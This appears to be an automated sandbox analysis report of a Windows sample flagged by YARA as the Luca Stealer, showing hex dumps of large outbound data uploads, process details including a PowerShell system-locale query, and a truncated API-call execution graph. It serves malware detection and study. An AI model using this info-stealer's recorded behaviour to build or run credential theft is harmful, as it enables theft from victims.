                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: bf 46 98 17 89 6d 1e c8 36 00 92 f8 f7 08 09 db bc 20 b6 79 a1 1c bc 30 b2 79 51 d8 e6 81 24 01 60 9b ff 4c 32 cf 62 9b ff 68 32 cf c3 36 ff 56 b6 f9 b7 08 f3 1c 6c 03 20 fe 7d 6c f3 1f c9 36 ff 1a 25 79 a1 6c f3 c2 58 3c 07 99 e7 60 9b 07 12 ff 3e b6 f9 d7 08 f3 3c 6c f3 1f 45 e6 59 6c f3 40 b6 91 c4 0b 93 88 07 92 79 0e b6 79 a0 30 cf 41 24 ff 12 db dc 4f 12 f7 b3 cd 8b ca 36 cf 8f cc 8b cc 36 cf 2d cc bf 8f cd f3 63 9b 17 45 98 e7 60 9b 07 92 79 a1 2c 9e 2f 99 e7 cb 36 ff 12 db 3c 90 24 9e 1f db c8 20 09 00 db d8 e6 7e 92 20 13 00 49 48 02 c0 36 b6 b1 4d 51 00 60 1b 00 db 48 e2 7e 99 89 24 00 24 01 60 1b 00 db a8 04 92 90 c1 36 b6 b1 cd 03 d9 26 0c 92 90 84 24 6c 63 1b f1 c2 d9 46 12 00 b6 01 b0 4d 44 20 89 61 18 50 04 11 81 24 00 6c 63 1b 80 88 a0 b5
                                                                          Data Ascii: Fm6 y0yQ$`L2bh26Vl }l6%ylX<`><lEYl@yy0A$O66-cE`y,/6<$ ~ IH6MQ`H~$$`6&$lcFMD aP$lc
                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: 09 5e 38 db fc 67 92 c1 36 f7 93 c4 bf c4 36 ff d1 6c f3 40 92 00 b0 cd 0b 23 f3 ef 62 9b 7f 8f 30 2f 32 db fc 47 13 cf 66 9b ff 2c b6 79 7e c2 c1 f3 63 9b fb 49 e2 f9 b1 cd bf 97 cc bf 8a 6d fe 35 64 b0 cd 03 49 c2 36 ff 11 c2 5c 26 09 db d8 e6 bf 92 b8 c2 36 0f 64 9b 7f 2b db dc 4f 12 f7 b3 cd 73 2b c9 bf 8b 6d 5e 18 f1 c2 d9 e6 b9 d9 e6 df ca 36 ff 1a 61 fe 7d 52 3c 37 db dc 4f 12 2f 4c 34 03 20 09 db d8 e6 df cb 36 2f 2a f1 fc d9 e6 45 a1 6c 48 e2 7e b6 f9 d7 10 ff 32 db bc 20 e6 39 89 17 2e cc 73 b0 05 80 6d 24 f1 40 b6 b9 9f 6d 1e 48 12 00 72 72 3f db 3c 90 6d 24 01 60 9b e7 47 e6 45 66 9b e7 96 18 00 49 3c 3f 92 b0 cd 73 b3 0d 36 5d 14 00 6c 93 99 d8 06 20 10 92 b8 9f 6d 00 24 71 3f db 10 c2 36 32 cf 22 09 db dc cf 36 61 b0 0d 80 24 24 21 09 67 02
                                                                          Data Ascii: ^8g66l@#b0/2Gf,y~cIm5dI6\&6d+Os+m^6a}R<7O/L4 6/*ElH~2 9.sm$@mHrr?<m$`GEfI<?s6]l m$q?62"6a$$!g
                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: 49 00 64 26 b6 01 88 08 ae 08 ee 67 9b e7 d6 95 8a 6d 6c 73 3f db 64 26 b6 29 a5 60 1b 00 49 d8 26 33 29 a5 50 6b 65 18 06 22 02 49 d8 c6 36 f7 b3 0d 80 24 6c 63 1b 49 44 04 b6 69 ad 51 15 00 d8 46 12 92 00 c8 4c 6c 63 1b 49 44 04 00 99 49 66 12 11 d4 5a c9 4c 24 61 9b cc 04 20 22 90 84 6d 4a 29 64 26 99 89 6d 1e 48 12 b6 89 08 00 32 13 db 44 04 b6 c9 4c ba ae 63 9a 26 24 51 6b 25 33 99 a6 89 88 a0 ef 7b 86 f5 1a 49 44 04 11 41 66 32 4d 13 92 a8 b5 32 4d 13 11 41 44 00 60 1b 80 cc 24 33 91 c4 fd 24 21 89 fb d9 26 33 91 84 24 00 6c 63 1b 49 00 48 a2 b5 86 6d 24 21 09 80 88 40 12 81 b0 8d 6d 32 13 db 00 44 04 92 c8 4c 00 24 01 60 1b db 00 d8 a6 94 82 6d 00 6c 23 09 00 db d8 a6 94 c2 03 d9 e6 7e 92 90 84 6d 32 13 00 49 00 48 02 a0 20 6c 63 1b db 48 02 40 12
                                                                          Data Ascii: Id&gmls?d&)`I&3)Pke"I6$lcIDiQFLlcIDIfZL$a "mJ)d&mH2DLc&$Qk%3{IDAf2M2MAD`$3$!&3$lcIHm$!@m2DL$`ml#~m2IH lcH@
                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: bf 86 cc f3 b0 cd 8b 2a 78 4e b6 f9 0f 95 e6 df 22 cc 73 b0 cd 03 d9 e6 45 21 f3 42 d9 e6 df c3 36 0f 24 9e 93 24 6c 63 1b 80 82 78 7e 6c f3 fc c8 3c 8b 24 00 6c 73 3f db 3c 37 db 3c 90 24 9e 1f db a0 e4 81 c2 3c 53 00 60 9b e7 90 e6 32 07 97 29 f9 8f 66 1b 99 cb 32 13 49 44 04 00 b6 b1 4d 18 24 61 9b e7 c7 36 0f 24 89 fb d9 06 c0 36 21 71 3f 49 00 d8 e6 7e 92 b0 8d 6d 24 01 60 1b db 5c 91 dc 4f 12 cf 4f 9b 26 a2 14 24 d1 a6 09 45 50 4a a1 b5 46 45 d8 c6 36 92 88 08 24 61 1b db d8 06 40 12 b6 b1 0d 40 44 20 89 d6 1a b6 79 6e 92 00 90 84 6d 00 22 02 db 64 26 f7 93 04 40 20 00 6c 63 9b cc c4 36 11 81 24 0a e2 7e 99 89 6d 6c 53 4a c1 36 b6 b1 0d 40 44 70 bf 88 c0 36 b6 01 88 08 6c 93 99 64 26 b5 56 5a 6b d8 a6 94 02 40 66 62 9b 88 40 e6 39 48 02 c0 36 ad 35
                                                                          Data Ascii: *xN"sE!B6$$lcx~l<$ls?<7<$<S`2)f2IDM$a6$6!q?I~m$`\OO&$EPJFE6$a@@D ynm"d&@ lc6$~mlSJ6@Dp6ld&VZk@fb@9H65
                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: 22 09 49 48 e2 7e 92 00 18 c7 91 88 40 12 b6 b1 8d 24 24 01 20 fd e0 ca 00 b6 79 20 49 00 d8 e6 79 d8 30 ad 79 bd df fe 36 3e fa c7 3e 91 ff 0d be f6 2d 3f 9b df 78 ad 0f 84 c5 36 94 ca fd 6c f3 c2 48 e2 85 b1 cd bf c7 f8 ba 3f c2 fe 3d 7f 09 9e 40 81 24 24 21 09 49 80 50 04 92 90 84 22 40 22 24 50 20 05 48 48 01 12 a1 80 08 20 90 82 8b ad e7 f4 ef 7f 30 ff 59 64 5e 28 db fc 47 f9 fe fa d3 bc f3 3b bf 33 99 09 80 79 26 f3 2c c6 3c 9b c0 e6 32 81 0d 02 6c 83 84 6d 24 a8 a5 f0 a3 3f fa a3 bc f9 9b bf 39 e7 cf 5f e0 67 7f e3 77 f8 b2 78 3d ee 88 93 fc 8b c4 0b 90 3c a7 e4 f9 91 83 e7 c7 bc 00 e2 39 19 c4 b3 99 fb 05 92 b0 cd 15 01 80 24 ee 27 09 24 ee 27 09 00 49 84 c4 fd 6c 63 1b db d8 c6 36 b6 21 1b 72 43 06 db 00 d8 e6 32 1b 00 45 00 60 9b 07 92 04 80 6d
                                                                          Data Ascii: "IH~@$$ y Iy0y6>>-?x6lH?=@$$!IP"@"$P HH 0Yd^(G;3y&,<2lm$?9_gwx=<9$'$'Ilc6!rC2E`m
                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: 36 0f 24 89 07 b2 cd b3 0c 47 e8 dc 6d fc ec 67 bf 0c ff 11 76 5e f2 a5 79 cd 3f fc 2b 9e db 1f bd c9 eb 70 fe f7 7e 9b ff 28 6f f1 71 bf 06 d7 3e 14 8e 5f c7 b3 05 ff 1e 61 fe 5d da 1b fe 14 60 b0 81 04 27 38 81 04 2a d4 63 5c bc f5 57 90 84 22 88 10 42 28 02 45 10 12 44 10 0a 90 90 02 95 40 04 8a 00 05 f5 f7 3e 81 ff a9 64 5e 64 df 3a fc 20 ef fd de ef c3 d4 1a 00 1f f0 53 f7 f1 7d 7f bd cf 4b 5d 37 e3 4f 3f e4 26 c0 d8 80 04 c0 df de b3 e6 1d 7e e8 1e 9e b1 3b f1 40 0f 3a 5e f9 d1 77 be 8e 97 bc ae e7 d2 2a 79 c7 1f be 87 2f 7b e3 53 bc e4 b5 3d af f4 2d 77 f2 b7 f7 0c bc fb 4b 6f f1 ad 6f 75 06 80 ae 56 be fa 6b be 86 4f bc e6 03 f9 d7 b2 cd 0b e5 e0 bf 93 f8 f7 09 f3 1f 2e c5 65 92 c8 4c 9e 2f 09 80 a0 00 60 1b db 20 9e 83 22 00 b0 40 12 92 90 04 80
                                                                          Data Ascii: 6$Gmgv^y?+p~(oq>_a]`'8*c\W"B(ED@>d^d: S}K]7O?&~;@:^w*y/{S=-wKoouVkO.eL/` "@
                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: f3 7c 85 79 16 db fc 7b d9 e6 81 c4 bf 9e 6d fe ab 44 13 2f 2a db fc 4b 6c f3 1f 49 e6 32 db 3c 90 24 00 6c f3 fc 04 57 d8 e6 85 91 79 91 d9 e6 81 6c 23 89 e7 c7 36 2f 8a 92 3c 8b 6d fe a3 d9 06 40 3c 7f 92 b0 cd 73 b3 cd 8b 22 cc 65 b6 79 0e 69 00 24 71 3f db dc 2f 00 db 38 0c 80 6d 1e c8 36 00 92 00 08 73 99 24 00 6c 63 1b 08 00 24 71 3f db dc 4f 12 cf cd 36 cf 92 e6 7e b6 b9 9f 0c b6 a9 b5 62 1b 00 db 28 cd 03 35 8c 6d 00 24 51 10 f7 b3 8d 6d 00 24 01 20 9e 93 6d 00 6c 03 20 09 00 49 48 a2 b5 c6 fd 24 f1 2f b1 cd 03 d9 26 33 89 08 22 02 80 d6 1a 92 28 a5 e0 61 02 40 12 00 b6 91 84 24 00 6c 93 99 d8 46 12 00 b6 91 44 44 70 3f db d8 e6 7e 92 90 44 66 72 3f db dc 4f 12 92 c0 46 69 ee 97 99 d8 26 22 88 08 32 93 fb 49 c2 36 b6 01 b0 8d 24 22 02 49 d8 c6 36
                                                                          Data Ascii: |y{mD/*KlI2<$lWyl#6/<m@<s"eyi$q?/8m6s$lc$q?O6~b(5m$Qm$ ml IH$/&3"(a@$lFDDp?~Dfr?OFi&"2I6$"I6
                                                                          2024-12-13 11:46:43 UTC389INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Fri, 13 Dec 2024 11:46:43 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 1227
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:06:45:39
                                                                          Start date:13/12/2024
                                                                          Path:C:\Users\user\Desktop\888.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\888.exe"
                                                                          Imagebase:0xf90000
                                                                          File size:4'885'504 bytes
                                                                          MD5 hash:B6E5859C20C608BF7E23A9B4F8B3B699
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.2711187553.0000000000974000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.2711187553.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710106623.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.2711570869.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2709905866.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710305791.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710305791.0000000000973000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710106623.000000000095D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710587236.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:06:46:18
                                                                          Start date:13/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                                                          Imagebase:0x9a0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:06:46:18
                                                                          Start date:13/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:2.5%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:13.7%
                                                                            Total number of Nodes:628
                                                                            Total number of Limit Nodes:4
                                                                            execution_graph 1788 11b9d40 SetThreadStackGuarantee 1789 11b9d82 GetLastError 1788->1789 1792 11b9d8c 1788->1792 1790 11b9df7 1789->1790 1789->1792 1800 12dbef0 1790->1800 1794 11b9dd1 HeapFree 1792->1794 1796 11b9dc2 HeapFree 1792->1796 1796->1794 1803 11be9e0 1800->1803 1804 11be9ea 1803->1804 1805 11be9fe 1803->1805 1809 12dc040 1804->1809 1818 11bea20 1805->1818 1810 12dbef0 78 API calls 1809->1810 1811 12dc07f 1810->1811 1821 12dc0b0 1811->1821 1827 11bea30 1818->1827 1822 12dc108 1821->1822 1823 12dc167 1821->1823 1825 12dbef0 78 API calls 1822->1825 1824 12dbef0 78 API calls 1823->1824 1826 12dc1f6 1824->1826 1825->1823 1829 11bea6d 1827->1829 1828 11beaaf 1830 11beb20 77 API calls 1828->1830 1829->1828 1835 11beb20 1829->1835 1831 11beae2 1830->1831 1833 11bea25 1831->1833 1834 11beb00 HeapFree 1831->1834 1834->1833 1836 11bf06a 1835->1836 1837 11beb77 1835->1837 1838 11a1d20 2 API calls 1836->1838 1886 11a3bc0 1837->1886 1840 11bf0e5 1838->1840 1846 11a1e80 2 API calls 1840->1846 1841 11beb80 1842 11beba1 1841->1842 1910 12dc300 1841->1910 1844 11bebab AcquireSRWLockShared 1842->1844 1845 11bf0f0 1842->1845 1847 11bebfb 1844->1847 1882 11bec92 1844->1882 1848 11a1d20 2 API calls 1845->1848 1849 11bf13d 1846->1849 1852 11bedcc 1847->1852 1853 11bec27 1847->1853 1848->1840 1850 11bf171 1849->1850 1851 11a2260 2 API calls 1849->1851 1850->1828 1851->1850 1854 11a3bc0 74 API calls 1852->1854 1853->1882 1913 11a2420 1853->1913 1856 11bedd5 1854->1856 1855 11bed7d ReleaseSRWLockShared 1857 11a3bc0 74 API calls 1855->1857 1858 11bede3 1856->1858 1856->1882 1857->1882 1859 12dc300 74 API calls 1858->1859 1878 11bedc4 1859->1878 1861 11beda3 1863 12dc300 74 API calls 1861->1863 1863->1878 1867 12e6bb0 74 API calls 1867->1878 1868 11bef5a AcquireSRWLockExclusive 1872 11bef7f 1868->1872 1873 11bef76 1868->1873 1870 11befcd ReleaseSRWLockExclusive 1874 11afde0 74 API calls 1870->1874 1871 11bef16 1875 12dc300 74 API calls 1871->1875 1988 12e6bb0 1872->1988 1877 11bdf60 74 API calls 1873->1877 1874->1878 1875->1878 1877->1878 1878->1867 1878->1870 1880 11bf053 1878->1880 1883 107d250 2 API calls 1878->1883 1884 12dc300 74 API calls 1878->1884 1880->1836 1885 107d250 2 API calls 1880->1885 1882->1855 1882->1861 1882->1868 1882->1871 1882->1878 1920 11bdf60 1882->1920 1933 11a2260 1882->1933 1939 107d250 1882->1939 1944 11a1d20 1882->1944 1949 11a1e80 1882->1949 1954 11b1340 1882->1954 1956 11afde0 1882->1956 1883->1878 1884->1878 1885->1836 1887 11a3c58 1886->1887 1888 11a3bce TlsGetValue 1886->1888 2004 12e6800 1887->2004 1891 11a3bdb 1888->1891 1892 11a3be1 1891->1892 1893 11a3bef TlsGetValue 1891->1893 1894 12e6800 74 API calls 1891->1894 1892->1841 1896 11a3bfc 1893->1896 1897 11a3c54 1893->1897 1894->1893 1898 11a3c3d 1896->1898 1997 fb1220 1896->1997 1897->1841 1898->1841 1901 11a3c1c 1904 11a3c34 TlsSetValue 1901->1904 1905 12e6800 74 API calls 1901->1905 1902 11a3c82 2021 12dbae0 1902->2021 1904->1898 1905->1904 1907 11a3d09 1907->1841 1908 11a3c91 1908->1907 1909 11a3cfa HeapFree 1908->1909 1909->1907 1911 12dbef0 78 API calls 1910->1911 1912 12dc371 1911->1912 2264 11a26e0 1913->2264 1915 11a2452 1916 11a246a 1915->1916 2293 11a1b80 1915->2293 1916->1882 1918 11a2465 1918->1916 1919 12dbef0 78 API calls 1918->1919 1919->1916 1924 11bdfeb 1920->1924 1921 11be05b 1922 11be1a6 1921->1922 1925 11be07b 1921->1925 1926 11be131 1921->1926 1931 11be08f 1921->1931 1922->1882 1923 11be04a HeapFree 1923->1921 1924->1921 1924->1923 1929 11be03b HeapFree 1924->1929 2349 11be830 AcquireSRWLockExclusive 1925->2349 1927 11be830 74 API calls 1926->1927 1927->1931 1929->1923 1930 11be195 HeapFree 1930->1922 1931->1922 1931->1930 1932 11be186 HeapFree 1931->1932 1932->1930 1934 11a226a 1933->1934 1935 11a2282 1933->1935 1934->1935 1936 11a2273 HeapFree 1934->1936 1937 11a229c 1935->1937 1938 11a228d HeapFree 1935->1938 1936->1935 1937->1882 1938->1937 1940 107d26a 1939->1940 1941 107d259 HeapFree 1939->1941 1942 107d284 1940->1942 1943 107d275 HeapFree 1940->1943 1941->1940 1942->1882 1943->1942 1946 11a1d70 1944->1946 1945 11a1d7a 1945->1882 1946->1945 1947 11a1de7 HeapFree 1946->1947 1948 11a1dd8 HeapFree 1946->1948 1947->1945 1948->1947 1950 11a1f08 1949->1950 1952 11a1eb2 1949->1952 1950->1882 1951 11a1ef9 HeapFree 1951->1950 1952->1951 1953 11a1eea HeapFree 1952->1953 1953->1951 2356 11b134f 1954->2356 1957 11afe98 1956->1957 1958 11afdef TlsGetValue 1956->1958 1960 12e6800 72 API calls 1957->1960 1961 11afdfc 1958->1961 1960->1958 1962 11afe04 1961->1962 1963 11afe19 TlsGetValue 1961->1963 1965 12e6800 72 API calls 1961->1965 1962->1882 1963->1962 1966 11afe26 1963->1966 1965->1963 1967 fb1220 3 API calls 1966->1967 1969 11afe67 1966->1969 1968 11afe42 1967->1968 1970 11afec2 1968->1970 1971 11afe46 1968->1971 1969->1962 1972 107d250 2 API calls 1969->1972 1973 12dbae0 72 API calls 1970->1973 1976 12e6800 72 API calls 1971->1976 1978 11afe5e TlsSetValue 1971->1978 1972->1962 1974 11afed1 1973->1974 1977 11aff18 TlsSetValue 1974->1977 1980 12e6800 72 API calls 1974->1980 1976->1978 1981 11aff59 HeapFree 1977->1981 1982 11aff45 1977->1982 1978->1969 1980->1977 1983 11aff6e 1981->1983 1984 11aff71 1981->1984 1982->1981 1987 107d250 2 API calls 1982->1987 1985 11aff83 TlsSetValue 1983->1985 1986 12e6800 72 API calls 1984->1986 1985->1882 1986->1985 1987->1981 1989 11a3bc0 78 API calls 1988->1989 1990 12e6bb6 1989->1990 1991 12e6bba 1990->1991 1992 12dc300 78 API calls 1990->1992 1991->1873 1993 12e6be0 1992->1993 1994 12e6bea 1993->1994 2389 12e6430 1993->2389 1994->1873 1996 12e6c26 1996->1873 1998 fb122f 1997->1998 1999 fb1240 GetProcessHeap 1997->1999 2000 fb1254 HeapAlloc 1998->2000 2001 fb1234 RtlAllocateHeap 1998->2001 1999->1998 2002 fb1275 1999->2002 2000->2002 2003 fb1264 2000->2003 2001->2002 2002->1901 2002->1902 2003->2002 2005 12e680e InitOnceBeginInitialize 2004->2005 2006 12e6881 TlsAlloc 2004->2006 2009 12e68bc 2005->2009 2010 12e6835 2005->2010 2007 12e691b 2006->2007 2008 12e6893 2006->2008 2067 12e6980 2007->2067 2013 12e689e 2008->2013 2014 12e68a7 TlsFree 2008->2014 2064 12e6950 2009->2064 2012 12e683c TlsAlloc 2010->2012 2010->2013 2017 12e68da InitOnceComplete 2012->2017 2018 12e684b 2012->2018 2013->1888 2014->2013 2019 12dbef0 72 API calls 2017->2019 2018->2018 2020 12e686d InitOnceComplete 2018->2020 2019->2007 2020->2013 2070 fb1340 2021->2070 2023 12dbb60 2108 fae560 2023->2108 2025 12dbaeb 2025->2023 2102 fae630 2025->2102 2026 12dbb65 2026->1908 2029 12dbb70 2030 12dbae0 77 API calls 2029->2030 2031 12dbb79 2030->2031 2032 12dbef0 77 API calls 2031->2032 2033 12dbbdf 2032->2033 2034 12dbef0 77 API calls 2033->2034 2035 12dbc3f 2034->2035 2036 12dbef0 77 API calls 2035->2036 2037 12dbc9f 2036->2037 2038 12dbef0 77 API calls 2037->2038 2041 12dbcff 2038->2041 2039 12dbd6f 2040 fae560 77 API calls 2039->2040 2042 12dbd74 2040->2042 2041->2039 2113 fc15e9 2041->2113 2042->1908 2045 12dbd80 2046 12dbae0 77 API calls 2045->2046 2047 12dbd89 2046->2047 2048 12dbef0 77 API calls 2047->2048 2049 12dbdd3 2048->2049 2050 12dbef0 77 API calls 2049->2050 2051 12dbe22 2050->2051 2052 fb1220 3 API calls 2051->2052 2053 12dbe3e 2052->2053 2054 12dbeae 2053->2054 2055 12dbe42 2053->2055 2056 12dbae0 77 API calls 2054->2056 2057 12dbe6a 2055->2057 2058 12dbebd 2055->2058 2059 12dbe8b HeapFree 2055->2059 2056->2058 2057->1908 2060 12dc0b0 77 API calls 2058->2060 2059->2057 2061 12dbeec 2060->2061 2062 11be9e0 77 API calls 2061->2062 2063 12dbf18 2062->2063 2065 12dc0b0 78 API calls 2064->2065 2066 12e697e 2065->2066 2068 12dc0b0 78 API calls 2067->2068 2069 12e69b2 2068->2069 2120 11c0240 2070->2120 2072 fb17d3 2158 12dbfe0 2072->2158 2073 fb1802 2079 12dc200 78 API calls 2073->2079 2074 fb1345 2074->2072 2074->2073 2075 fb1735 2074->2075 2076 fb17e1 2074->2076 2078 fb1810 2074->2078 2081 fb1727 2074->2081 2082 fb17f2 2074->2082 2085 fb181e 2074->2085 2086 fb16bb 2074->2086 2090 fb182a 2074->2090 2155 12dbf80 2074->2155 2083 fb173d 2075->2083 2088 12dbf80 78 API calls 2075->2088 2161 12dc200 2076->2161 2080 12dbfe0 78 API calls 2078->2080 2079->2078 2080->2085 2081->2025 2089 12dbfe0 78 API calls 2082->2089 2083->2081 2093 12dbf80 78 API calls 2083->2093 2087 12dc200 78 API calls 2085->2087 2091 fb16e1 2086->2091 2096 12dbf80 78 API calls 2086->2096 2087->2090 2088->2083 2089->2073 2092 12dbfe0 78 API calls 2090->2092 2095 fb16f2 2091->2095 2097 12dbf80 78 API calls 2091->2097 2098 fb183c 2092->2098 2093->2072 2095->2081 2100 12dbf80 78 API calls 2095->2100 2096->2091 2097->2095 2099 fb1853 2098->2099 2168 12dbcff 2098->2168 2099->2025 2100->2075 2103 fae63c 2102->2103 2106 fae665 2102->2106 2104 fae670 2103->2104 2105 fae650 HeapReAlloc 2103->2105 2103->2106 2104->2106 2107 fb1220 3 API calls 2104->2107 2105->2106 2106->2023 2106->2026 2106->2029 2107->2106 2109 12dbef0 77 API calls 2108->2109 2110 fae596 2109->2110 2111 fae5ba 2110->2111 2112 fae5a9 HeapFree 2110->2112 2111->2026 2112->2111 2114 fc15f6 2113->2114 2117 fc1616 2113->2117 2115 fc1624 2114->2115 2116 fc160d 2114->2116 2114->2117 2115->2117 2119 fb1220 3 API calls 2115->2119 2255 fb1280 2116->2255 2117->2039 2117->2042 2117->2045 2119->2117 2194 11c0230 2120->2194 2122 11c024b 2123 11c0261 TlsGetValue 2122->2123 2125 12e6800 72 API calls 2122->2125 2126 11c026e 2123->2126 2125->2123 2127 11c0284 TlsGetValue 2126->2127 2128 12e6800 72 API calls 2126->2128 2144 11c0276 2126->2144 2130 11c029a 2127->2130 2127->2144 2128->2127 2131 11c0306 2130->2131 2133 fb1220 3 API calls 2130->2133 2231 12e6ee0 2131->2231 2134 11c02b6 2133->2134 2135 11c02be 2134->2135 2136 11c0349 2134->2136 2137 11c02e0 TlsSetValue 2135->2137 2141 12e6800 72 API calls 2135->2141 2138 12dbae0 72 API calls 2136->2138 2137->2131 2142 11c0358 2138->2142 2140 11c030b 2140->2144 2249 11b9d00 2140->2249 2141->2137 2146 12e6800 72 API calls 2142->2146 2149 11c0398 TlsSetValue 2142->2149 2144->2074 2146->2149 2147 11c03d9 HeapFree 2150 11c03ee 2147->2150 2151 11c03f1 2147->2151 2148 11c03c5 2148->2147 2154 11b9d00 3 API calls 2148->2154 2149->2147 2149->2148 2152 11c0403 TlsSetValue 2150->2152 2153 12e6800 72 API calls 2151->2153 2152->2074 2153->2152 2154->2147 2156 12dbef0 78 API calls 2155->2156 2157 12dbfdf 2156->2157 2159 12dbef0 78 API calls 2158->2159 2160 12dc03f 2159->2160 2162 12dbef0 78 API calls 2161->2162 2163 12dc25f 2162->2163 2164 12dbef0 78 API calls 2163->2164 2165 12dc2a6 2164->2165 2166 12dbef0 78 API calls 2165->2166 2167 12dc2f6 2166->2167 2169 12dbd6f 2168->2169 2170 12dbd0b 2168->2170 2171 fae560 77 API calls 2169->2171 2173 fc15e9 7 API calls 2170->2173 2172 12dbd74 2171->2172 2172->2099 2174 12dbd58 2173->2174 2174->2169 2174->2172 2175 12dbd80 2174->2175 2176 12dbae0 77 API calls 2175->2176 2177 12dbd89 2176->2177 2178 12dbef0 77 API calls 2177->2178 2179 12dbdd3 2178->2179 2180 12dbef0 77 API calls 2179->2180 2181 12dbe22 2180->2181 2182 fb1220 3 API calls 2181->2182 2183 12dbe3e 2182->2183 2184 12dbeae 2183->2184 2185 12dbe42 2183->2185 2186 12dbae0 77 API calls 2184->2186 2187 12dbe6a 2185->2187 2188 12dbebd 2185->2188 2189 12dbe8b HeapFree 2185->2189 2186->2188 2187->2099 2190 12dc0b0 77 API calls 2188->2190 2189->2187 2191 12dbeec 2190->2191 2192 11be9e0 77 API calls 2191->2192 2193 12dbf18 2192->2193 2195 11bde20 HeapFree HeapFree HeapFree HeapFree 2194->2195 2196 11c0235 2195->2196 2197 11c0230 72 API calls 2196->2197 2198 11c024b 2197->2198 2199 11c0261 TlsGetValue 2198->2199 2201 12e6800 72 API calls 2198->2201 2202 11c026e 2199->2202 2201->2199 2203 11c0276 2202->2203 2204 11c0284 TlsGetValue 2202->2204 2205 12e6800 72 API calls 2202->2205 2203->2122 2204->2203 2207 11c029a 2204->2207 2205->2204 2208 11c0306 2207->2208 2210 fb1220 RtlAllocateHeap GetProcessHeap HeapAlloc 2207->2210 2209 12e6ee0 72 API calls 2208->2209 2217 11c030b 2209->2217 2211 11c02b6 2210->2211 2212 11c02be 2211->2212 2213 11c0349 2211->2213 2214 11c02e0 TlsSetValue 2212->2214 2218 12e6800 72 API calls 2212->2218 2215 12dbae0 72 API calls 2213->2215 2214->2208 2219 11c0358 2215->2219 2217->2203 2220 11b9d00 HeapFree HeapFree HeapFree 2217->2220 2218->2214 2222 12e6800 72 API calls 2219->2222 2225 11c0398 TlsSetValue 2219->2225 2220->2203 2222->2225 2223 11c03d9 HeapFree 2226 11c03ee 2223->2226 2227 11c03f1 2223->2227 2224 11c03c5 2224->2223 2230 11b9d00 HeapFree HeapFree HeapFree 2224->2230 2225->2223 2225->2224 2228 11c0403 TlsSetValue 2226->2228 2229 12e6800 72 API calls 2227->2229 2228->2122 2229->2228 2230->2223 2232 11a2420 78 API calls 2231->2232 2233 12e6f12 2232->2233 2234 